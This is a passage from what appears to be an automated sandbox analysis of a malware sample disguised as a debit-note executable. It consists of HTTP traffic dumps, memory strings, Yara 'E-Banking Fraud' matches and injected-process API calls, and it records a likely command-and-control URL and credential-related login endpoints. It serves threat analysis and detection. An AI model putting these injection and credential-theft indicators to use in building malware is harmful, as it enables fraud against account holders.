74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 73 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6d 6f 2e 6a 70 2f 69 6d 61 67 65 73 2f 70 75 62 6c 69 63 2f 63 6f 6d 6d 6f 6e 2f 6c 6f 67 6f 2e 67 69 66 22 20 61 6c 74 3d 22 47 4d 4f 20 49 6e 74 65 72 6e 65 74 2c 20 49 6e 63 2e 22 3e 3c 2f 68 31 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 22 3e 0a 3c 68 31 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 64 65 74 61 69 6c 22 3e e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 9a e3 83 bc e3 82 b8 ef bc 88 55 52 4c ef bc 89 e3 81 af e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 80 82 3c 2f 70 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 61 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 6e 61 6d 61 65 2d 73 65 72 76 65 72 2e 63 6f 6d 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e3 81 8a e5 90 8d e5 89 8d 2e 63 6f 6d 20 e3 83 ac e3 83 b3 e3 82 bf e3 83 ab e3 82 b5 e3 83 bc e3 83 90 e3 83 bc e3 81 ae e3 83 88 e3 83 83 e3 83 97 e3 83 9a e3 83 bc e3 82 b8 e3 81 ab e6 88 bb e3 82 8b 3c 2f 61 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 04 Nov 2024 09:13:32 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 04 Nov 2024 09:13:34 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 04 Nov 2024 09:13:37 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Mon, 04 Nov 2024 09:13:39 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
                Source: xcopy.exe, 00000006.00000002.4098892628.0000000004298000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000003908000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: xcopy.exe, 00000006.00000002.4098892628.0000000004C04000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000004274000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.gmo.jp/images/public/common/logo.gif
                Source: PMZSowQBcVJqD.exe, 00000007.00000002.4099556675.0000000005694000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jivatop.online
                Source: PMZSowQBcVJqD.exe, 00000007.00000002.4099556675.0000000005694000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jivatop.online/kbf1/
                Source: xcopy.exe, 00000006.00000002.4098892628.0000000004C04000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000004274000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.onamae-server.com/
                Source: xcopy.exe, 00000006.00000002.4098892628.0000000004C04000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000004274000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.onamae.com/?banner_id=634
                Source: xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: xcopy.exe, 00000006.00000002.4095507452.000000000300A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: xcopy.exe, 00000006.00000002.4095507452.000000000300A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: xcopy.exe, 00000006.00000002.4095507452.000000000300A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: xcopy.exe, 00000006.00000002.4095507452.0000000002FE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: xcopy.exe, 00000006.00000002.4095507452.000000000300A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: xcopy.exe, 00000006.00000002.4095507452.0000000002FE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: xcopy.exe, 00000006.00000003.2243798989.0000000007F6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: xcopy.exe, 00000006.00000002.4098892628.0000000004F28000.00000004.10000000.00040000.00000000.sdmp, xcopy.exe, 00000006.00000002.4098892628.0000000004106000.00000004.10000000.00040000.00000000.sdmp, xcopy.exe, 00000006.00000002.4100845977.0000000006540000.00000004.00000800.00020000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000003776000.00000004.00000001.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000004598000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4097004785.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4099556675.0000000005630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2058640139.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4097236613.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4096792766.0000000003740000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2059058691.0000000004D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe, 00000000.00000000.1629129401.00000000008C2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8d7a8c05-c
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe, 00000000.00000000.1629129401.00000000008C2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3bce7540-0
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ea0a6475-2
                Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_67e97044-1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C393 NtClose,1_2_0042C393
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036735C0 NtCreateMutant,LdrInitializeThunk,1_2_036735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672B60 NtClose,LdrInitializeThunk,1_2_03672B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03672DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03674340 NtSetContextThread,1_2_03674340
